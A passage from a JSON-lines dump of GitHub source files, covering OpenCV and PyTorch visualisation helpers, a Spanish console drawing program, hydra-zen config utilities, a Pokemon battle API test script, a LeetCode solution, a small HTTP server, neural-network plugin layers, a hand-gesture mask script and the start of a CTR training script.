np.load('PCAmean.npy')\n # PCAeigen = np.load('PCAeigen.npy')\n\n # result = cv2.PCAProject(pred,PCAmean,PCAeigen)\n\n # print np.shape(result)\n return result\n # return pred\n","repo_name":"sugiya-y/StyleTransferWords","sub_path":"arbitrary_image_stylization_word/vggparam.py","file_name":"vggparam.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"26911717909","text":"import torch\nimport cv2\nimport numpy as np\nimport torch.nn.functional as F\nimport os\nimport os.path as osp\n\n_COLORS = np.array(\n [\n 0.000, 0.447, 0.741,\n 0.850, 0.325, 0.098,\n 0.929, 0.694, 0.125,\n 0.494, 0.184, 0.556,\n 0.466, 0.674, 0.188,\n 0.301, 0.745, 0.933,\n 0.635, 0.078, 0.184,\n 0.300, 0.300, 0.300,\n 1.000, 0.667, 0.500,\n 1.000, 1.000, 0.500,\n 0.000, 0.333, 1.000,\n 0.000, 0.667, 1.000,\n 0.000, 1.000, 1.000,\n 0.333, 0.000, 1.000,\n 0.333, 0.333, 1.000,\n 0.333, 0.667, 1.000,\n 0.333, 1.000, 1.000,\n 0.667, 0.000, 1.000,\n 0.667, 0.333, 1.000\n ]\n).astype(np.float32).reshape(-1, 3)\n\ndef get_names_dict(model):\n \"\"\"Recursive walk to get names including path.\"\"\"\n names = {}\n\n def _get_names(module, parent_name=\"\"):\n for key, m in module.named_children():\n cls_name = str(m.__class__).split(\".\")[-1].split(\"'\")[0]\n num_named_children = len(list(m.named_children()))\n if num_named_children > 0:\n name = parent_name + \".\" + key if parent_name else key\n else:\n name = parent_name + \".\" + cls_name + \"_\" + key if parent_name else key\n names[name] = m\n\n if isinstance(m, torch.nn.Module):\n _get_names(m, parent_name=name)\n\n _get_names(model)\n return names\n\ndef show_img(imgs, window_names=None, wait_time_ms=0, is_merge=False, row_col_num=(1, -1)):\n \"\"\"\n Displays an image or a list of images in specified windows or self-initiated windows.\n You can also control display wait time by parameter 'wait_time_ms'.\n Additionally, this function provides an optional parameter 'is_merge' to\n decide whether to display all imgs in a particular window 'merge'.\n Besides, parameter 'row_col_num' supports user specified merge format.\n Notice, specified format must be greater than or equal to imgs number.\n\n :param imgs: numpy.ndarray or list.\n :param window_names: specified or None, if None, function will create different windows as '1', '2'.\n :param wait_time_ms: display wait time.\n :param is_merge: whether to merge all images.\n :param row_col_num: merge format. default is (1, -1), image will line up to show.\n example=(2, 5), images will display in two rows and five columns.\n \"\"\"\n if not isinstance(imgs, list):\n imgs = [imgs]\n\n if window_names is None:\n window_names = list(range(len(imgs)))\n else:\n if not isinstance(window_names, list):\n window_names = [window_names]\n assert len(imgs) == len(window_names), 'window names does not match images!'\n\n if is_merge:\n merge_imgs1 = merge_imgs(imgs, row_col_num)\n\n cv2.namedWindow('merge', 0)\n cv2.imshow('merge', merge_imgs1)\n else:\n for img, win_name in zip(imgs, window_names):\n if img is None:\n continue\n win_name = str(win_name)\n cv2.namedWindow(win_name, 0)\n cv2.imshow(win_name, img)\n\n cv2.waitKey(wait_time_ms)\n\ndef merge_imgs(imgs, row_col_num):\n \"\"\"\n Merges all input images as an image with specified merge format.\n\n :param imgs : img list\n :param row_col_num : number of rows and columns displayed\n :return img : merges img\n \"\"\"\n\n length = len(imgs)\n row, col = row_col_num\n\n assert row > 0 or col > 0, 'row and col cannot be negative at same time!'\n color = random_color(rgb=True).astype(np.float64)\n\n for img in imgs:\n cv2.rectangle(img, (0, 0), (img.shape[1], img.shape[0]), color)\n\n if row_col_num[1] < 0 or length < row:\n merge_imgs = np.hstack(imgs)\n elif row_col_num[0] < 0 or length < col:\n merge_imgs = np.vstack(imgs)\n else:\n assert row * col >= length, 'Imgs overboundary, not enough windows to display all imgs!'\n\n fill_img_list = [np.zeros(imgs[0].shape, dtype=np.uint8)] * (row * col - length)\n imgs.extend(fill_img_list)\n merge_imgs_col = []\n for i in range(row):\n start = col * i\n end = col * (i + 1)\n merge_col = np.hstack(imgs[start: end])\n merge_imgs_col.append(merge_col)\n\n merge_imgs = np.vstack(merge_imgs_col)\n\n return merge_imgs\n\ndef show_tensor(tensor, resize_hw=None, top_k=50, mode='CHW', is_show=True,\n wait_time_ms=0, show_split=True, is_merge=True, row_col_num=(1, -1)):\n \"\"\"\n\n :param wait_time_ms:\n :param tensor: torch.tensor\n :param resize_hw: list:\n :param top_k: int\n :param mode: string: 'CHW' , 'HWC'\n \"\"\"\n\n def normalize_numpy(array):\n max_value = np.max(array)\n min_value = np.min(array)\n array = (array - min_value) / (max_value - min_value)\n return array\n\n assert tensor.dim() == 3, 'Dim of input tensor should be 3, please check your tensor dimension!'\n\n # 默认tensor格式,通道在前\n if mode == 'CHW':\n tensor = tensor\n else:\n tensor = tensor.permute(2, 0, 1)\n\n # 利用torch中的resize函数进行插值, 选择双线性插值平滑\n if resize_hw is not None:\n tensor = tensor[None]\n tensor = F.interpolate(tensor, resize_hw, mode='bilinear')\n tensor = tensor.squeeze(0)\n\n tensor = tensor.permute(1, 2, 0)\n\n channel = tensor.shape[2]\n\n if tensor.device == 'cpu':\n tensor = tensor.detach().numpy()\n else:\n tensor = tensor.cpu().detach().numpy()\n if not show_split:\n # sum可能会越界,所以需要归一化\n sum_tensor = np.sum(tensor, axis=2)\n sum_tensor = normalize_numpy(sum_tensor) * 255\n sum_tensor = sum_tensor.astype(np.uint8)\n\n # 热力图显示\n sum_tensor = cv2.applyColorMap(np.uint8(sum_tensor), cv2.COLORMAP_JET)\n # mean_tensor = cv2.applyColorMap(np.uint8(mean_tensor), cv2.COLORMAP_JET)\n\n if is_show:\n show_img([sum_tensor], ['sum'], wait_time_ms=wait_time_ms)\n return [sum_tensor]\n else:\n assert top_k > 0, 'top k should be positive!'\n channel_sum = np.sum(tensor, axis=(0, 1))\n index = np.argsort(channel_sum)\n select_index = index[:top_k]\n tensor = tensor[:, :, select_index]\n tensor = np.clip(tensor, 0, np.max(tensor))\n\n single_tensor_list = []\n if top_k > channel:\n top_k = channel\n for c in range(top_k):\n single_tensor = tensor[..., c]\n single_tensor = normalize_numpy(single_tensor) * 255\n single_tensor = single_tensor.astype(np.uint8)\n\n single_tensor = cv2.applyColorMap(np.uint8(single_tensor), cv2.COLORMAP_JET)\n single_tensor_list.append(single_tensor)\n\n if is_merge:\n return_imgs = merge_imgs(single_tensor_list, row_col_num=row_col_num)\n else:\n return_imgs = single_tensor_list\n\n if is_show:\n show_img(return_imgs, wait_time_ms=wait_time_ms, is_merge=is_merge)\n return return_imgs\n\ndef random_color(rgb=False, maximum=255):\n \"\"\"\n Args:\n rgb (bool): whether to return RGB colors or BGR colors.\n maximum (int): either 255 or 1\n\n Returns:\n ndarray: a vector of 3 numbers\n \"\"\"\n idx = np.random.randint(0, len(_COLORS))\n ret = _COLORS[idx] * maximum\n if not rgb:\n ret = ret[::-1]\n return ret\n\ndef imdenormalize(img, mean, std, to_bgr=True):\n assert img.dtype != np.uint8\n mean = mean.reshape(1, -1).astype(np.float64)\n std = std.reshape(1, -1).astype(np.float64)\n img = cv2.multiply(img, std) # make a copy\n cv2.add(img, mean, img) # inplace\n if to_bgr:\n cv2.cvtColor(img, cv2.COLOR_RGB2BGR, img) # inplace\n return img\n\ndef imwrite(img, file_path, params=None, auto_mkdir=True):\n \"\"\"Write image to file.\n\n Args:\n img (ndarray): Image array to be written.\n file_path (str): Image file path.\n params (None or list): Same as opencv's :func:`imwrite` interface.\n auto_mkdir (bool): If the parent folder of `file_path` does not exist,\n whether to create it automatically.\n\n Returns:\n bool: Successful or not.\n \"\"\"\n if auto_mkdir:\n dir_name = osp.abspath(osp.dirname(file_path))\n mkdir_or_exist(dir_name)\n return cv2.imwrite(file_path, img, params)\n\ndef mkdir_or_exist(dir_name, mode=0o777):\n if dir_name == '':\n return\n dir_name = osp.expanduser(dir_name)\n os.makedirs(dir_name, mode=mode, exist_ok=True)\n\ndef traverse_file_paths(path, extensions, exclude_extensions=None):\n \"\"\"\n Recursively reads all files under given folder, until all files have been ergodic.\n You can also specified file extensions to read or not to read.\n :return: list: path_list contains all wanted files.\n \"\"\"\n\n def is_valid_file(x):\n if exclude_extensions is None:\n return x.lower().endswith(extensions)\n else:\n return x.lower().endswith(extensions) and not x.lower().endswith(exclude_extensions)\n\n # check_file_exist(path)\n if isinstance(extensions, list):\n extensions = tuple(extensions)\n if isinstance(exclude_extensions, list):\n exclude_extensions = tuple(exclude_extensions)\n\n all_list = os.listdir(path)\n path_list = []\n for subpath in all_list:\n path_next = os.path.join(path, subpath)\n if os.path.isdir(path_next):\n path_list.extend(traverse_file_paths(path_next, extensions, exclude_extensions))\n else:\n if is_valid_file(path_next):\n path_list.append(path_next)\n return path_list","repo_name":"HUST-OROP/CopperDefect","sub_path":"utils/tools/feature_map_visual/mmdet_mini/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9776,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"4826425247","text":"import os\r\ndef cerrarprograma():\r\n os.system(\"clear\")\r\n\r\ntabla = []\r\nalto = 82\r\ncont1=0\r\nlargo = 42\r\nfor x in range(largo):\r\n for y in range(alto):\r\n if x == 0 or x == largo - 1:\r\n tabla.append(\".\")\r\n elif y == 0 or y == alto - 1:\r\n tabla.append(\".\")\r\n else:\r\n tabla.append(\" \")\r\n matriz= ''.join(tabla)\r\n print(matriz)\r\n tabla=[]\r\nprint(\"MENU\")\r\nprint()\r\nprint(\"1.Agregar una línea\")\r\nprint()\r\nprint(\"2.Agregar una elipse o círculo\")\r\nprint()\r\nprint(\"3.Agregar un rectángulo o cuadrado\")\r\nprint()\r\nprint(\"4.Agregar un triángulo\")\r\nprint()\r\nprint(\"5.Mostrar un Dibujo\")\r\nprint()\r\nprint(\"6.Leer un dibujo\")\r\nprint()\r\nprint(\"7.Grabar un dibujo\")\r\nprint()\r\nprint(\"0.Cerrar programa\")\r\nprint()\r\nn = int(input(\"Selecciona una opción: \"))\r\nif n==0:\r\n cerrarprograma()\r\nif n == 1:\r\n print(\"Por el momento solo funciona en diagonales con punto x y punto y iguales. Próximamente mejorará.\")\r\n x1 = int(input(\"¿Cuál es el x del primer punto?: \"))\r\n while not -1 < x1 < 83:\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n x1 = int(input(\"¿Cuál es el primer punto?: \"))\r\n print(\"Listo\")\r\n y1 = int(input(\"¿Cuál es el y del primer punto?: \"))\r\n while not -1 < y1 < 43 :\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n y1 = int(input(\"¿Cuál es el y del primer punto?: \"))\r\n print(\"Listo\")\r\n x2 = int(input(\"¿Cuál es el x del segundo punto?: \"))\r\n while not -1 < x2 < 83 :\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n x2 = int(input(\"¿Cuál es el x del segundo punto?: \"))\r\n print(\"Listo\")\r\n y2 = int(input(\"¿Cuál es el y del segundo punto?: \"))\r\n while not -1 < y2 < 43 :\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n y2 = int(input(\"¿Cuál es el y del segundo punto?: \"))\r\n print(\"Listo\")\r\n for x in range(largo):\r\n for y in range(alto):\r\n if x == 0 or x == largo - 1:\r\n tabla.append(\".\")\r\n elif y == 0 or y == alto - 1:\r\n tabla.append(\".\")\r\n elif x==x1 and y==y1:\r\n tabla.append('x')\r\n elif x==x2 and y==y2:\r\n tabla.append('x')\r\n elif y2==y or y1==y:\r\n tabla.append(' ')\r\n elif x2>x>x1 and y1>y2:\r\n tabla.append(' ')\r\n elif x==y and x\"\nKNOWN_MUTABLE_TYPES: Set[\n Union[Type[List[Any]], Type[Dict[Any, Any]], Type[Set[Any]]]\n] = {list, dict, set}\n\nT = TypeVar(\"T\")\n\n\n# The typeshed definition of `field` has an inaccurate annotation:\n# https://github.com/python/typeshed/blob/b9e1d7d522fe90b98e07d43a764bbe60216bc2c4/stdlib/dataclasses.pyi#L109\n# This makes it impossible for `make_dataclass` to by type-correct in the eyes of\n# static checkers. See https://github.com/microsoft/pyright/issues/1680 for discussion.\n#\n# We happen to make rather heavy use of `make_dataclass`, thus we..*sigh*.. we provide\n# our own overloads for `field`.\n@overload # `default` and `default_factory` are optional and mutually exclusive.\ndef field(\n *,\n default: Any,\n init: bool = ...,\n repr: bool = ...,\n hash: Optional[bool] = ...,\n compare: bool = ...,\n metadata: Optional[Mapping[Any, Any]] = ...,\n) -> Field[Any]: # pragma: no cover\n ...\n\n\n@overload\ndef field(\n *,\n default_factory: Callable[[], Any],\n init: bool = ...,\n repr: bool = ...,\n hash: Optional[bool] = ...,\n compare: bool = ...,\n metadata: Optional[Mapping[Any, Any]] = ...,\n) -> Field[Any]: # pragma: no cover\n ...\n\n\ndef field(\n *,\n default: Any = MISSING,\n default_factory: Union[Callable[[], Any], Any] = MISSING,\n init: bool = True,\n repr: bool = True,\n hash: Optional[bool] = None,\n compare: bool = True,\n metadata: Optional[Mapping[Any, Any]] = None,\n) -> Field[Any]:\n if default is MISSING:\n return cast(\n Field[Any],\n _field(\n default_factory=default_factory,\n init=init,\n repr=repr,\n hash=hash,\n compare=compare,\n metadata=metadata,\n ),\n )\n else:\n return cast(\n Field[Any],\n _field(\n default=default,\n init=init,\n repr=repr,\n hash=hash,\n compare=compare,\n metadata=metadata,\n ),\n )\n\n\ndef safe_name(obj: Any, repr_allowed: bool = True) -> str:\n \"\"\"Tries to get a descriptive name for an object. Returns '`\n instead of raising - useful for writing descriptive/dafe error messages.\"\"\"\n\n if hasattr(obj, \"__name__\"):\n return obj.__name__.replace(\"\", \"lambda\")\n\n if repr_allowed and hasattr(obj, \"__repr__\"):\n return repr(obj).replace(\"\", \"lambda\")\n\n return UNKNOWN_NAME\n\n\ndef is_classmethod(obj: Any) -> bool:\n \"\"\"\n https://stackoverflow.com/a/19228282/6592114\n\n Credit to: Martijn Pieters\n License: CC BY-SA 4.0 (free to copy/redistribute/remix/transform)\"\"\"\n\n if not inspect.ismethod(obj):\n return False\n\n bound_to = getattr(obj, \"__self__\", None)\n if not isinstance(bound_to, type):\n # must be bound to a class\n return False\n name = safe_name(obj)\n\n if name == UNKNOWN_NAME: # pragma: no cover\n return False\n\n for cls in bound_to.__mro__:\n descriptor = vars(cls).get(name)\n if descriptor is not None:\n return isinstance(descriptor, classmethod)\n return False # pragma: no cover\n\n\ndef building_error_prefix(target: Any) -> str:\n return f\"Building: {safe_name(target)} ..\\n\"\n\n\nNoneType = type(None)\n\n\ndef is_interpolated_string(x: Any) -> TypeGuard[InterpStr]:\n # This is only a necessary check – not a sufficient one – that `x`\n # is a valid interpolated string. We do not verify that it rigorously\n # satisfies omegaconf's grammar\n return isinstance(x, str) and len(x) > 3 and x.startswith(\"${\") and x.endswith(\"}\")\n\n\ndef check_suspicious_interpolations(\n validated_wrappers: Sequence[Any], zen_meta: Mapping[str, Any], target: Any\n):\n \"\"\"Looks for patterns among zen_meta fields and interpolated fields in\n wrappers. Relative interpolations pointing to the wrong level will produce\n a warning\"\"\"\n for _w in validated_wrappers:\n if is_interpolated_string(_w):\n _lvl = _w.count(\".\") # level of relative-interp\n _field_name = _w.replace(\".\", \"\")[2:-1]\n if (\n _lvl\n and _field_name in zen_meta\n and _lvl != (1 if len(validated_wrappers) == 1 else 2)\n ):\n _expected = II(\n \".\" * (1 if len(validated_wrappers) == 1 else 2) + _field_name\n )\n\n warnings.warn(\n building_error_prefix(target)\n + f\"A zen-wrapper is specified via the interpolated field, {_w},\"\n f\" along with the meta-field name {_field_name}, however it \"\n f\"appears to point to the wrong level. It is likely you should \"\n f\"change {_w} to {_expected}\"\n )\n yield _expected\n\n\ndef valid_defaults_list(hydra_defaults: Any) -> bool:\n \"\"\"\n Raises\n ------\n HydraZenValidationError: Duplicate _self_ entries\"\"\"\n if not isinstance(hydra_defaults, (list, ListConfig)):\n return False\n\n has_self = False\n for item in hydra_defaults:\n if item == \"_self_\":\n if not has_self:\n has_self = True\n continue\n raise HydraZenValidationError(\n \"`hydra_defaults` cannot have more than one '_self_' entry\"\n )\n\n if isinstance(item, (dict, DictConfig)):\n for k, v in item.items():\n if not isinstance(k, str):\n return False\n\n if (\n not isinstance(v, (str, list, ListConfig))\n and v is not None\n and v != MISSING\n ):\n return False\n elif isinstance(item, str):\n continue\n elif is_dataclass(item):\n # no validation here\n continue\n else:\n return False\n\n if not has_self:\n warnings.warn(\n \"Defaults list is missing `_self_`. See https://hydra.cc/docs/upgrades/1.0_to_1.1/default_composition_order for more information\",\n category=UserWarning,\n )\n return True\n\n\ndef merge_settings(\n user_settings: Optional[ZenConvert], default_settings: AllConvert\n) -> AllConvert:\n \"\"\"Merges settings as `default_settings.update(user_settings)`\"\"\"\n if user_settings is not None and not isinstance(user_settings, Mapping):\n raise TypeError(\n f\"`zen_convert` must be None or Mapping[str, Any] (e.g. dict). Got {user_settings}\"\n )\n settings = default_settings.copy()\n if user_settings:\n for k, v in user_settings.items():\n if k not in convert_types:\n raise ValueError(\n f\"The key `{k}` is not a valid zen_convert setting. The available settings are: {', '.join(sorted(convert_types))}\"\n )\n if not isinstance(v, convert_types[k]):\n raise TypeError(\n f\"Setting {k}={v} specified a value of the wrong type. Expected type: {convert_types[k].__name__}\"\n )\n settings[k] = v\n return settings\n\n\n_DATACLASS_OPTION_KEYS: FrozenSet[str] = (\n DataclassOptions.__required_keys__ | DataclassOptions.__optional_keys__\n)\n\n_STRICT_DATACLASS_OPTION_KEYS: FrozenSet[str] = (\n StrictDataclassOptions.__required_keys__ | StrictDataclassOptions.__optional_keys__\n)\n_STRICT_DATACLASS_OPTION_KEYS.copy()\n\n\ndef parse_dataclass_options(\n options: Mapping[str, Any], include_module: bool = True\n) -> DataclassOptions:\n \"\"\"\n Ensures `options` adheres to `DataclassOptions` and merges hydra-zen defaults\n for missing options.\n\n All valid `@dataclass`/`make_dataclass` options are supported, even for features\n introduced in later versions of Python. This function will remove valid options\n that are not supported for by the current Python version.\n\n Parameters\n ----------\n options : Mapping[str, Any]\n User-specified options for `zen_dataclass` to be validated.\n\n Returns\n -------\n DataclassOptions\n\n Examples\n --------\n >>> parse_dataclass_options({})\n {'unsafe_hash': True}\n\n >>> parse_dataclass_options({\"unsafe_hash\": False, \"cls_name\": \"Foo\"})\n {'unsafe_hash': False, 'cls_name': 'Foo'}\n\n >>> parse_dataclass_options({\"moo\": 1})\n ValueError: moo is not a valid dataclass option.\n\n Options that are supported by `make_dataclass` for later versions of\n Python are ignored/removed automatically by this function. E.g. the following\n Python 3.10+ option has the following behavior in Python 3.9:\n\n >>> parse_dataclass_options({\"slots\": False})\n {'unsafe_hash': True}\n \"\"\"\n if not isinstance(options, Mapping):\n raise ValueError(\n f\"`zen_dataclass_options` is expected to be `None` or dict[str, bool]. Got \"\n f\"{options} (type: {type(options)}).\"\n )\n\n merged = DEFAULT_DATACLASS_OPTIONS.copy()\n\n for name, val in options.items():\n if name in UNSUPPORTED_DATACLASS_OPTIONS:\n continue\n elif name not in _DATACLASS_OPTION_KEYS:\n raise ValueError(f\"{name} is not a valid dataclass option.\")\n\n if name == \"module\":\n if val is not None and (\n not isinstance(val, str)\n or not all(\n v.isidentifier() and not iskeyword(v) for v in val.split(\".\")\n )\n ):\n raise ValueError(\n f\"dataclass option `{name}` must be a valid module name, got {val}\"\n )\n\n elif name == \"cls_name\":\n if val is not None and (not isinstance(val, str) or not val.isidentifier()):\n raise ValueError(\n f\"dataclass option `{name}` must be a valid identifier, got {val}\"\n )\n elif name == \"bases\":\n if not isinstance(val, Iterable) or any(\n not (is_dataclass(_b) and isinstance(_b, type)) for _b in val\n ):\n raise TypeError(\n f\"dataclass option `{name}` must be a tuple of dataclass types\"\n )\n elif name == \"namespace\":\n if not isinstance(val, Mapping) or any(\n not isinstance(v, str) or not v.isidentifier() for v in val\n ):\n raise ValueError(\n f\"dataclass option `{name}` must be a mapping with string-valued keys \"\n f\"that are valid identifiers. Got {val}.\"\n )\n elif name == \"target\":\n if not isinstance(val, str) or not all(\n x.isidentifier() for x in val.split(\".\")\n ):\n raise TypeError(\n f\"dataclass option `target` must be a string and an import path, \"\n f\"got {val!r}\"\n )\n elif not isinstance(val, bool):\n raise TypeError(\n f\"dataclass option `{name}` must be of type `bool`. Got {val} \"\n f\"(type: {type(val)})\"\n )\n merged[name] = val\n if (\n include_module\n and \"module\" not in merged\n and \"module\" in _STRICT_DATACLASS_OPTION_KEYS\n ): # pragma: no cover\n # For Python 3.12+ we want the default module to\n # remain \"types\" rather than being inferred as some\n # internal hydra-zen module.\n merged[\"module\"] = \"types\"\n return merged\n\n\ndef parse_strict_dataclass_options(\n options: Mapping[str, Any]\n) -> TypeGuard[StrictDataclassOptions]:\n return (\n options.keys() <= _STRICT_DATACLASS_OPTION_KEYS\n and StrictDataclassOptions.__required_keys__ <= options.keys()\n )\n\n\n_HYDRA_CONVERT_OPTIONS = (\n {\"none\", \"partial\", \"all\", \"object\"}\n if HYDRA_SUPPORTS_OBJECT_CONVERT\n else {\"none\", \"partial\", \"all\"}\n)\n\n\ndef validate_hydra_options(\n hydra_recursive: Optional[bool] = None,\n hydra_convert: Optional[Literal[\"none\", \"partial\", \"all\", \"object\"]] = None,\n) -> None:\n if hydra_recursive is not None and not isinstance(hydra_recursive, bool):\n raise TypeError(\n f\"`hydra_recursive` must be a boolean type, got {hydra_recursive}\"\n )\n\n if hydra_convert is not None and hydra_convert not in _HYDRA_CONVERT_OPTIONS:\n raise ValueError(\n f\"`hydra_convert` must be 'none', 'partial',\"\n f\"{' object' if HYDRA_SUPPORTS_OBJECT_CONVERT else ''} or 'all', got: \"\n f\"{hydra_convert}\"\n )\n","repo_name":"mit-ll-responsible-ai/hydra-zen","sub_path":"src/hydra_zen/structured_configs/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":13567,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"18"} +{"seq_id":"31135136275","text":"import requests\r\nimport json\r\ntoken = '181e9195a049ec50a01032126911a7f5'\r\nresponse = requests.post ('https://pokemonbattle.me:5000/pokemons',headers = {'Content-Type' : 'application/json',\r\n'trainer_token' : token},\r\njson = {\r\n \"name\": \"Opponent\",\r\n \"photo\": \"https://static.wikia.nocookie.net/pokemon/images/2/21/001Bulbasaur.png\"\r\n})\r\npokemon_id = response.json()['id']\r\nresponse_change = requests.put('https://pokemonbattle.me:5000/pokemons',headers = {'Content-Type' : 'application/json',\r\n'trainer_token' : token}, json ={\r\n \"pokemon_id\": pokemon_id,\r\n \"name\": \"Opponent 78\",\r\n \"photo\": \"\" \r\n })\r\nresponse = requests.post ('https://pokemonbattle.me:5000/pokemons/trainers/add_pokeball',headers = {'Content-Type' : 'application/json',\r\n'trainer_token' : token},\r\njson = {\r\n \"pokemon_id\": \"3186\"\r\n})\r\nprint (response_change.text) ","repo_name":"nikita-shevchukov/python_autotests","sub_path":"test/PythonProjects/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43475328522","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author: xiezizhe\n@Date: 26/2/2020 上午11:13\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n if nums is None:\n return 0\n if len(nums) <= 1:\n return len(nums)\n cur_idx, next_idx = 0, 1\n while next_idx < len(nums):\n if nums[next_idx] == nums[cur_idx]:\n while next_idx < len(nums) and nums[next_idx] == nums[cur_idx]:\n next_idx += 1\n if next_idx < len(nums):\n nums[cur_idx + 1] = nums[next_idx]\n else:\n break\n cur_idx += 1\n next_idx += 1\n nums[cur_idx] = nums[next_idx - 1]\n\n return cur_idx + 1\n\n\nif __name__ == '__main__':\n l = [1, 1, 1, 1, 1, 2, 2, 3, 4, 5, 6]\n s = Solution()\n print(s.removeDuplicates(l))\n print(l)\n","repo_name":"forrest0402/leetcode","sub_path":"python/26. Remove Duplicates from Sorted Array.py","file_name":"26. Remove Duplicates from Sorted Array.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29705705245","text":"import http.server\nfrom socketserver import ThreadingMixIn\nimport threading\nimport json, re\n\nclass ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):\n allow_reuse_address = True\n def shutdown(self):\n self.socket.close()\n http.server.HTTPServer.shutdown(self)\n\ndef route(path):\n def _route(f):\n setattr(f, '__route__', path)\n return f\n return _route\n\ndef read_params(path):\n query = path.split('?')\n if len(query) > 1:\n query = query[1].split('&')\n return dict(map(lambda x: x.split('='), query))\n\ndef get(req_handler, routes):\n for name, handler in routes.__class__.__dict__.items():\n if hasattr(handler, \"__route__\"):\n if None != re.search(handler.__route__, req_handler.path):\n req_handler.send_response(200)\n req_handler.send_header('Content-Type', 'application/json')\n req_handler.send_header('Access-Control-Allow-Origin', '*')\n req_handler.end_headers()\n params = read_params(req_handler.path)\n data = json.dumps(handler(routes, params)) + '\\n'\n req_handler.wfile.write(bytes(data, encoding = 'utf-8'))\n return\n\ndef run(routes, host = '0.0.0.0', port = 8080):\n class RequestHandler(http.server.BaseHTTPRequestHandler):\n def log_message(self, *args, **kwargs):\n pass\n def do_GET(self):\n get(self, routes)\n server = ThreadedHTTPServer((host, port), RequestHandler)\n thread = threading.Thread(target = server.serve_forever)\n thread.daemon = True\n thread.start()\n print (f\"HTTP server started on port {port}\")\n","repo_name":"paramtt/twitch-custom","sub_path":"server/srv.py","file_name":"srv.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3971502820","text":"import torch.nn as nn\n\nfrom .registry import PLUGIN_LAYERS\n\n\n@PLUGIN_LAYERS.register_module()\nclass Dropout2d_(nn.Dropout2d):\n \"\"\" To fit the plugin interface\n \"\"\"\n\n def __init__(self, in_channels, p, inplace=True):\n super(Dropout2d_, self).__init__(p, inplace=inplace)\n\n\n@PLUGIN_LAYERS.register_module()\nclass SELayer(nn.Module):\n _abbr_ = 'se'\n def __init__(self, in_channels, reduction=16):\n super(SELayer, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(in_channels, in_channels // reduction, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(in_channels // reduction, in_channels, bias=False),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n b, c, _, _ = x.size()\n y = self.avg_pool(x).view(b, c)\n y = self.fc(y).view(b, c, 1, 1)\n return x * y.expand_as(x)\n","repo_name":"tfwu/iVMCL-Release","sub_path":"mmcv/mmcv/cnn/bricks/plugin_ivmcl.py","file_name":"plugin_ivmcl.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"3830363981","text":"import numpy as np\r\nimport cv2\r\n\r\n\r\n# Open Camera\r\ncapture = cv2.VideoCapture(0)\r\n\r\nwhile capture.isOpened():\r\n\r\n # Capture frames from the camera\r\n ret, frame = capture.read()\r\n\r\n # Get hand data from the rectangle sub window\r\n cv2.rectangle(frame, (100, 100), (300, 300), (0, 255, 0), 0)\r\n crop_image = frame[100:300, 100:300]\r\n\r\n # Apply Gaussian blur\r\n blur = cv2.GaussianBlur(crop_image, (3, 3), 0)\r\n\r\n # Change color-space from BGR -> HSV\r\n hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\r\n\r\n # Create a binary image with where white will be skin colors and rest is black\r\n mask2 = cv2.inRange(hsv, np.array([2, 0, 0]), np.array([20, 255, 255]))\r\n cv2.imshow(\"image\",mask2);\r\n\r\n # Kernel for morphological transformation\r\n kernel = np.ones((5, 5))\r\n\r\n # Apply morphological transformations to filter out the background noise\r\n dilation = cv2.dilate(mask2, kernel, iterations=1)\r\n erosion = cv2.erode(dilation, kernel, iterations=1)\r\n\r\n # Apply Gaussian Blur and Threshold\r\n filtered = cv2.GaussianBlur(erosion, (3, 3), 0)\r\n ret, thresh = cv2.threshold(filtered, 127, 255, 0)\r\n#####\r\n #cv2.imshow(\"Threshold\",thresh)\r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\n\r\ncapture.release()\r\ncv2.destroyAllWindows()","repo_name":"RashmithaEttadi/HandGestureRecognition","sub_path":"pg2.py","file_name":"pg2.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4099135257","text":"import hetu as ht\nfrom hetu.launcher import launch\nfrom hetu import init\nfrom hetu.gpu_ops.SharedTable import SharedTableOp\nfrom hetu.communicator.mpi_nccl_comm import ncclDataType_t, ncclRedOp_t\n\nfrom models.hetuctr_data import load_dataset\nfrom models.hetuctr_models import WDL, DCN, DFM\n\nimport os.path as osp\nimport numpy as np\nimport yaml\nimport time\nimport argparse\nfrom sklearn import metrics\n\ndef comm_sync_data(comm, *args):\n array = ht.array(args, ht.cpu())\n comm.dlarrayNcclAllReduce(array, array, ncclDataType_t.ncclFloat32, ncclRedOp_t.ncclSum, comm.stream)\n comm.stream.sync()\n return array.asnumpy() / comm.nRanks.value\n\ndef worker(args):\n def train(iterations, auc_enabled=False):\n localiter = range(iterations)\n train_loss = []\n train_acc = []\n if auc_enabled:\n train_auc = []\n for it in localiter:\n loss_val, predict_y, y_val, _ = executor.run('train', convert_to_numpy_ret_vals=True)\n if y_val.shape[1] == 1: # for criteo case\n acc_val = np.equal(\n 